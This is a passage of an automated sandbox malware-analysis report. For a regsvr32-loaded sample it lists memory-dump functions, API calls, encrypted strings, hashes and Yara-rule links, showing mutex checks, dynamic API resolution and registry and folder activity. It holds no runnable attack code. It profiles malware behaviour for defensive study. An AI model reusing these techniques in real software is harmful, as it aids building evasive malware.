Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
Instruction ID: b3fffa1208d716b76968909db200f4bebc5b0dc66853285539bc32db1b454081
Opcode Fuzzy Hash: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
Instruction Fuzzy Hash: 48113076608B8186D760CB45F4407AAB7A1F788B90F984139EECE93B59CF7CE445CB40

Uniqueness

Uniqueness Score: 3.32%

Function 00007FF983DBAEE4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42UNIQUELIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF983DBAF28
RaiseException.KERNEL32 ref: 00007FF983DBAF6E

Strings

csm, xrefs: 00007FF983DBAF5B

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4b2abc229b787bd2aa37325733de34257fbf421e309b557da95ae71b0bce365c
Instruction ID: 75a6dbfb736feaf3b7731d00ede2317a178583b48f2d0ad8033df6f5ed0520a0
Opcode Fuzzy Hash: 4b2abc229b787bd2aa37325733de34257fbf421e309b557da95ae71b0bce365c
Instruction Fuzzy Hash: 5B113D72608B8192EB208F15E4406A97BA4FB88B84F5C4274EE8E5B758DF7CE955C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD6610, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983DD6641
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF983DD665B

Strings

InitializeCriticalSectionEx, xrefs: 00007FF983DD6635

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
Instruction ID: 570434c89e3778e1bce9dfb58f2bf5524118e45818c0e204cba8ae4842001622
Opcode Fuzzy Hash: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
Instruction Fuzzy Hash: A6F090A2F1864182EB14CB81B440A752620BF48B80FCD407DEA1F63745CEACF45DC780

Uniqueness

Uniqueness Score: 2.28%

Function 00007FF983DD65BC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983DD65E5
TlsSetValue.KERNEL32 ref: 00007FF983DD65FC

Strings

FlsSetValue, xrefs: 00007FF983DD65D2

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
Instruction ID: 5ce8a4b6eb1a0b0818d79ac37b826339a2d24d0d1f09e9bdb8dacbd6c83c0758
Opcode Fuzzy Hash: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
Instruction Fuzzy Hash: 97E037E2A0854292EB14CB91A400BB52621BF48780FCD403DE51F56255CEADF49DC650

Uniqueness

Uniqueness Score: 1.69%

Analysis Process: regsvr32.exe PID: 5276 Parent PID: 5280 regsvr32.exeUNIQUE

Executed Functions

Function 00007FF983D27EB0, Relevance: 70.8, APIs: 30, Strings: 10, Instructions: 815registryUNIQUE

Download Yara Rule

APIs

RegCloseKey.KERNELBASE ref: 00007FF983D2855B
SHCreateDirectoryExW.SHELL32 ref: 00007FF983D28573

Part of subcall function 00007FF983D081A0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D08305
Part of subcall function 00007FF983D081A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D0830B

Part of subcall function 00007FF983D1B330: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D1B572

ExitProcess.KERNEL32 ref: 00007FF983D28AE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28BF8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28BFE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C04
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C0A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C10
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C1C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C22
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C28
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C2E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C34
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C3A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C40
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C46
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C4C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C58
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C5E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C64
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C6A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C76
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C7C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C82
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C8E

Strings

c49ff0c512b63183b3b9933942f35f3b9767f14025f2b157b84cb6ecdc406c389a71dd4f34ecb955915b94eed958752b816acc6c0cc9917da04584c8e458693190, xrefs: 00007FF983D28340
a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd, xrefs: 00007FF983D289BB
?, xrefs: 00007FF983D2837E
/s ", xrefs: 00007FF983D280CC
a337e267db176c5fb3deb0ceddc5345fe682342094e5fde3258f50cb66c792b97f, xrefs: 00007FF983D2845B
a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f, xrefs: 00007FF983D288D8
384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19, xrefs: 00007FF983D280A4
370d6e253a3a93578a1081bc37558c01722c167025728cb4506e8b5b00, xrefs: 00007FF983D27EF9
980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983D287F5
8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba, xrefs: 00007FF983D28712

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseConcurrency::cancel_current_taskCreateDirectoryExitProcess
String ID: /s "$370d6e253a3a93578a1081bc37558c01722c167025728cb4506e8b5b00$384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$?$a337e267db176c5fb3deb0ceddc5345fe682342094e5fde3258f50cb66c792b97f$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f$c49ff0c512b63183b3b9933942f35f3b9767f14025f2b157b84cb6ecdc406c389a71dd4f34ecb955915b94eed958752b816acc6c0cc9917da04584c8e458693190
API String ID: 4181945512-2298773885
Opcode ID: a4f7777331c9b74bce972c0d2823af234df58c92108e7d5fe7473dbe204aaac6
Instruction ID: ae9e290d892cb53bc7a7d64a6751b41d7278d38f3d15f4245a0e2faeddefe74b
Opcode Fuzzy Hash: a4f7777331c9b74bce972c0d2823af234df58c92108e7d5fe7473dbe204aaac6
Instruction Fuzzy Hash: FB8289A2B1478185EF00DBB5D4847AD2361FB417A4F949239EA6D67AE9DFBCF049C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D279B0, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 299
sleepsynchronizationUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00007FF983D279F2
CreateMutexExW.KERNELBASE ref: 00007FF983D27A4B
GetLastError.KERNEL32 ref: 00007FF983D27A54
CloseHandle.KERNEL32 ref: 00007FF983D27A64
ExitProcess.KERNEL32 ref: 00007FF983D27CF7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27E89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27E8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27E95
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27E9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27EA1

Strings

651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef, xrefs: 00007FF983D27A10
842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9, xrefs: 00007FF983D27B7A

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseCreateErrorExitHandleLastMutexProcessSleep
String ID: 651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef$842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9
API String ID: 1555049902-3969698901
Opcode ID: 6130f8192cf7a1099335397721d12142da09d362e5318939c57dade5d5abc463
Instruction ID: e106777066ef0de098bdc339d652128945d3edb6c2f188c8ccf91e95290ecbe8
Opcode Fuzzy Hash: 6130f8192cf7a1099335397721d12142da09d362e5318939c57dade5d5abc463
Instruction Fuzzy Hash: 09D1C2E2B0564282EB14DBF2D4587AD2362FB44B94F844539DA1EA7AD9DFBCF148C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D272C0, Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 420
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF983D081A0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D08305
Part of subcall function 00007FF983D081A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D0830B

SHGetFolderPathW.SHELL32 ref: 00007FF983D274D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27958
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2795E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27964
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2796A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27970
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27976
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2797C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27982
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27988
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2798E

Strings

953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3, xrefs: 00007FF983D274F7
413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432, xrefs: 00007FF983D273DE
41352f26a97e153f7b3157b47315edb36e, xrefs: 00007FF983D27453
b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347, xrefs: 00007FF983D27788

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFolderPath
String ID: 41352f26a97e153f7b3157b47315edb36e$413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432$953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3$b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347
API String ID: 4036707352-3052264634
Opcode ID: 26eec701310069ce8dcd72723181a107c6a4ba78c39c625106ed3ab7e7920267
Instruction ID: db2649fd3b571b31a344eb5a3c34bf0303409044538828f1ced06df1d9720de6
Opcode Fuzzy Hash: 26eec701310069ce8dcd72723181a107c6a4ba78c39c625106ed3ab7e7920267
Instruction Fuzzy Hash: 5E12C8A2B14B8195EF00DBA5D444B9D2322FB447A8F845239E66E57ADDDFBCF188C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D1BCCF, Relevance: 644.1, APIs: 211, Strings: 154, Instructions: 5325libraryloaderUNIQUE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF983D1BCD5
GetProcAddress.KERNEL32 ref: 00007FF983D1BE13
ExitProcess.KERNEL32 ref: 00007FF983D20FF0

Part of subcall function 00007FF983D1B580: WideCharToMultiByte.KERNEL32 ref: 00007FF983D1B5F8
Part of subcall function 00007FF983D1B580: WideCharToMultiByte.KERNEL32 ref: 00007FF983D1B6AF

GetProcAddress.KERNEL32 ref: 00007FF983D1BF5B
GetProcAddress.KERNEL32 ref: 00007FF983D1C0A3
GetProcAddress.KERNEL32 ref: 00007FF983D1C1EB
GetProcAddress.KERNEL32 ref: 00007FF983D1C333
GetProcAddress.KERNEL32 ref: 00007FF983D1C47B
GetProcAddress.KERNEL32 ref: 00007FF983D1C5C3
GetProcAddress.KERNEL32 ref: 00007FF983D1C70B
GetProcAddress.KERNEL32 ref: 00007FF983D1C853
GetProcAddress.KERNEL32 ref: 00007FF983D1C99B
GetProcAddress.KERNEL32 ref: 00007FF983D1CAE3

Part of subcall function 00007FF983D1B330: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D1B572

GetProcAddress.KERNEL32 ref: 00007FF983D1CC2B
GetProcAddress.KERNEL32 ref: 00007FF983D1CD73
GetProcAddress.KERNEL32 ref: 00007FF983D1CEBB
GetProcAddress.KERNEL32 ref: 00007FF983D1D003
GetProcAddress.KERNEL32 ref: 00007FF983D1D14B
GetProcAddress.KERNEL32 ref: 00007FF983D1D293
GetProcAddress.KERNEL32 ref: 00007FF983D1D3DB
GetProcAddress.KERNEL32 ref: 00007FF983D1D48D
GetProcAddress.KERNEL32 ref: 00007FF983D1D4FE

Part of subcall function 00007FF983D03D50: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D03DA8

GetProcAddress.KERNEL32 ref: 00007FF983D1D56F
GetProcAddress.KERNEL32 ref: 00007FF983D1D5E0
GetProcAddress.KERNEL32 ref: 00007FF983D1D651
GetProcAddress.KERNEL32 ref: 00007FF983D1D6C2
GetProcAddress.KERNEL32 ref: 00007FF983D1D733
GetProcAddress.KERNEL32 ref: 00007FF983D1D7A4
GetProcAddress.KERNEL32 ref: 00007FF983D1D815
GetProcAddress.KERNEL32 ref: 00007FF983D1D886
GetProcAddress.KERNEL32 ref: 00007FF983D1D8F7
GetProcAddress.KERNEL32 ref: 00007FF983D1D968
GetProcAddress.KERNEL32 ref: 00007FF983D1D9D9
GetProcAddress.KERNEL32 ref: 00007FF983D1DA4A
GetProcAddress.KERNEL32 ref: 00007FF983D1DABB
GetProcAddress.KERNEL32 ref: 00007FF983D1DB2C
GetProcAddress.KERNEL32 ref: 00007FF983D1DB9D
GetProcAddress.KERNEL32 ref: 00007FF983D1DC08
GetProcAddress.KERNEL32 ref: 00007FF983D1DC79
GetProcAddress.KERNEL32 ref: 00007FF983D1DCEA
GetProcAddress.KERNEL32 ref: 00007FF983D1DD5B
GetProcAddress.KERNEL32 ref: 00007FF983D1DDCC
GetProcAddress.KERNEL32 ref: 00007FF983D1DE3D
GetProcAddress.KERNEL32 ref: 00007FF983D1DEAE
GetProcAddress.KERNEL32 ref: 00007FF983D1DF1F
GetProcAddress.KERNEL32 ref: 00007FF983D1DF90
GetProcAddress.KERNEL32 ref: 00007FF983D1E001
GetProcAddress.KERNEL32 ref: 00007FF983D1E072
GetProcAddress.KERNEL32 ref: 00007FF983D1E0E3
GetProcAddress.KERNEL32 ref: 00007FF983D1E154
GetProcAddress.KERNEL32 ref: 00007FF983D1E1C5
GetProcAddress.KERNEL32 ref: 00007FF983D1E236
GetProcAddress.KERNEL32 ref: 00007FF983D1E2A7
GetProcAddress.KERNEL32 ref: 00007FF983D1E318
GetProcAddress.KERNEL32 ref: 00007FF983D1E389
GetProcAddress.KERNEL32 ref: 00007FF983D1E3FA
GetProcAddress.KERNEL32 ref: 00007FF983D1E46B
GetProcAddress.KERNEL32 ref: 00007FF983D1E4DC
GetProcAddress.KERNEL32 ref: 00007FF983D1E54D
GetProcAddress.KERNEL32 ref: 00007FF983D1E5BE
GetProcAddress.KERNEL32 ref: 00007FF983D1E62F
GetProcAddress.KERNEL32 ref: 00007FF983D1E6A0
GetProcAddress.KERNEL32 ref: 00007FF983D1E711
GetProcAddress.KERNEL32 ref: 00007FF983D1E782
GetProcAddress.KERNEL32 ref: 00007FF983D1E7F3
GetProcAddress.KERNEL32 ref: 00007FF983D1E864
GetProcAddress.KERNEL32 ref: 00007FF983D1E8D5
GetProcAddress.KERNEL32 ref: 00007FF983D1E946
GetProcAddress.KERNEL32 ref: 00007FF983D1E9B7
GetProcAddress.KERNEL32 ref: 00007FF983D1EA28
GetProcAddress.KERNEL32 ref: 00007FF983D1EA99
GetProcAddress.KERNEL32 ref: 00007FF983D1EB0A
LoadLibraryA.KERNEL32 ref: 00007FF983D1EB78
GetProcAddress.KERNEL32 ref: 00007FF983D1EBE0
GetProcAddress.KERNEL32 ref: 00007FF983D1EC51
GetProcAddress.KERNEL32 ref: 00007FF983D1ECC2
GetProcAddress.KERNEL32 ref: 00007FF983D1ED33
GetProcAddress.KERNEL32 ref: 00007FF983D1EDA4
GetProcAddress.KERNEL32 ref: 00007FF983D1EE15
GetProcAddress.KERNEL32 ref: 00007FF983D1EE86
GetProcAddress.KERNEL32 ref: 00007FF983D1EEF7
GetProcAddress.KERNEL32 ref: 00007FF983D1EF68
GetProcAddress.KERNEL32 ref: 00007FF983D1EFD9
GetProcAddress.KERNEL32 ref: 00007FF983D1F04A
GetProcAddress.KERNEL32 ref: 00007FF983D1F0BB
GetProcAddress.KERNEL32 ref: 00007FF983D1F12C
GetProcAddress.KERNEL32 ref: 00007FF983D1F19D
GetProcAddress.KERNEL32 ref: 00007FF983D1F20E
GetProcAddress.KERNEL32 ref: 00007FF983D1F27F
GetProcAddress.KERNEL32 ref: 00007FF983D1F2F0
GetProcAddress.KERNEL32 ref: 00007FF983D1F361
LoadLibraryA.KERNEL32 ref: 00007FF983D1F3CF
GetProcAddress.KERNEL32 ref: 00007FF983D1F437
GetProcAddress.KERNEL32 ref: 00007FF983D1F4A8
GetProcAddress.KERNEL32 ref: 00007FF983D1F519
GetProcAddress.KERNEL32 ref: 00007FF983D1F58A
GetProcAddress.KERNEL32 ref: 00007FF983D1F5FB
GetProcAddress.KERNEL32 ref: 00007FF983D1F66C
GetProcAddress.KERNEL32 ref: 00007FF983D1F6DD
GetProcAddress.KERNEL32 ref: 00007FF983D1F74E
GetProcAddress.KERNEL32 ref: 00007FF983D1F7BF
GetProcAddress.KERNEL32 ref: 00007FF983D1F830
LoadLibraryA.KERNELBASE ref: 00007FF983D1F89E
GetProcAddress.KERNEL32 ref: 00007FF983D1F906
GetProcAddress.KERNEL32 ref: 00007FF983D1F977
GetProcAddress.KERNEL32 ref: 00007FF983D1F9E8
GetProcAddress.KERNEL32 ref: 00007FF983D1FA59
LoadLibraryA.KERNEL32 ref: 00007FF983D1FAC7
GetProcAddress.KERNEL32 ref: 00007FF983D1FB2F
GetProcAddress.KERNEL32 ref: 00007FF983D1FBA0
GetProcAddress.KERNEL32 ref: 00007FF983D1FC11
GetProcAddress.KERNEL32 ref: 00007FF983D1FC82
GetProcAddress.KERNEL32 ref: 00007FF983D1FCF3
GetProcAddress.KERNEL32 ref: 00007FF983D1FD64
GetProcAddress.KERNEL32 ref: 00007FF983D1FDD5
GetProcAddress.KERNEL32 ref: 00007FF983D1FE46
GetProcAddress.KERNEL32 ref: 00007FF983D1FEB7
GetProcAddress.KERNEL32 ref: 00007FF983D1FF28
GetProcAddress.KERNEL32 ref: 00007FF983D1FF99
GetProcAddress.KERNEL32 ref: 00007FF983D2000A
GetProcAddress.KERNEL32 ref: 00007FF983D2007B
GetProcAddress.KERNEL32 ref: 00007FF983D200EC
GetProcAddress.KERNEL32 ref: 00007FF983D2015D
GetProcAddress.KERNEL32 ref: 00007FF983D201CE
LoadLibraryA.KERNEL32 ref: 00007FF983D2023C
GetProcAddress.KERNEL32 ref: 00007FF983D202A4
GetProcAddress.KERNEL32 ref: 00007FF983D20315
LoadLibraryA.KERNEL32 ref: 00007FF983D20383
GetProcAddress.KERNEL32 ref: 00007FF983D203EB
LoadLibraryA.KERNELBASE ref: 00007FF983D20459
GetProcAddress.KERNEL32 ref: 00007FF983D204C1
GetProcAddress.KERNEL32 ref: 00007FF983D20532
GetProcAddress.KERNEL32 ref: 00007FF983D205A3
GetProcAddress.KERNEL32 ref: 00007FF983D20614
GetProcAddress.KERNEL32 ref: 00007FF983D20685
GetProcAddress.KERNEL32 ref: 00007FF983D206F6
GetProcAddress.KERNEL32 ref: 00007FF983D20767
GetProcAddress.KERNEL32 ref: 00007FF983D207D8
GetProcAddress.KERNEL32 ref: 00007FF983D20849
GetProcAddress.KERNEL32 ref: 00007FF983D208BA
GetProcAddress.KERNEL32 ref: 00007FF983D2092B
GetProcAddress.KERNEL32 ref: 00007FF983D2099C
GetProcAddress.KERNEL32 ref: 00007FF983D20A0D
GetProcAddress.KERNEL32 ref: 00007FF983D20A7E
GetProcAddress.KERNEL32 ref: 00007FF983D20AEF
GetProcAddress.KERNEL32 ref: 00007FF983D20B60
GetProcAddress.KERNEL32 ref: 00007FF983D20BD1
GetProcAddress.KERNEL32 ref: 00007FF983D20C42
GetProcAddress.KERNEL32 ref: 00007FF983D20CB3
GetProcAddress.KERNEL32 ref: 00007FF983D20D24
GetProcAddress.KERNEL32 ref: 00007FF983D20D95
GetProcAddress.KERNEL32 ref: 00007FF983D20E06
GetProcAddress.KERNEL32 ref: 00007FF983D20E77
LoadLibraryA.KERNELBASE ref: 00007FF983D20EE5
GetProcAddress.KERNEL32 ref: 00007FF983D20F4D
GetProcAddress.KERNEL32 ref: 00007FF983D20FBA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2100C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21012
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21018
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2101E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21024
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2102A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21030
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21036
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2103C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21042
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21048
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2104E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21054
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2105A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21060
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21066
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2106C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21072
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21078
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2107E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21084
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2108A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21090
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21096
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2109C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210BA
